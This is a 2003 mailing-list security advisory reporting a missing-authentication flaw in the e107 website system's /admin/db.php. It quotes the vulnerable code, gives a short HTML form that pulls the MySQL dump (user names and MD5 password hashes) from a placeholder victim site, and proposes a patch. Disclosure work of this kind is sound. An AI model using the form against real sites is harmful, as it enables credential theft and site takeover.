e107 website system Vulnerability

From: Artoor Petrovich (artoorat_private)
Date: Thu Jul 24 2003 - 08:49:47 PDT

    Informations :

    Advisory Name: e107 website system Vulnerability

    Author: hiruvim <artoorat_private>

    Discover by: hiruvim <artoorat_private>

    Website vendor : http://e107.org

    Affected System(s): All versions

    Severity: High

    Platform(s): Windows and Unix

    Issue: Security holes enable attackers to get MySQL dump file with
    users and passwords.

    Details:

     In file /admin/db.php
    require_once("../class2.php");

    if(IsSet($_POST['dump_sql'])){
            getsql($mySQLdefaultdb);
            exit;
    }

    [....]
    require_once("auth.php");

    We can do dump_sql without authorization.

    Exploit:

    <form action="http://victim.org/admin/db.php">
    <input type=submit name="dump_sql">
    </form>

    When pressed submit query button we will get MySQL dump file.

    In dump file we will find username and passwd MD5 hash.

    With admin password we can get full site control and access to
    FileManager.

    Vendor: Not contacted yet.

    Patch:

    in /admin/db.php

    Before doing anything you will need tomove "require_once("auth.php");"
    to the top of the file.

    Sorry for my poor english:)

    hiruvim <artoorat_private>
    Original document can be fount at http://0x90.ipsec.ru/e107.txt